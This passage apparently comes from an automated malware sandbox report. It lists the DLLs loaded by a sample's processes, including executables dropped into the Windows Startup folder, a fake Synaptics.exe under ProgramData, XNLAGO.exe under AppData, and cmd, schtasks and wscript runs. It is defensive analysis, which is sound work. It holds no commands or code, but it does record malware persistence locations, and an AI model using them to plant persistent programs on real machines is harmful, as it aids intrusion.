                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
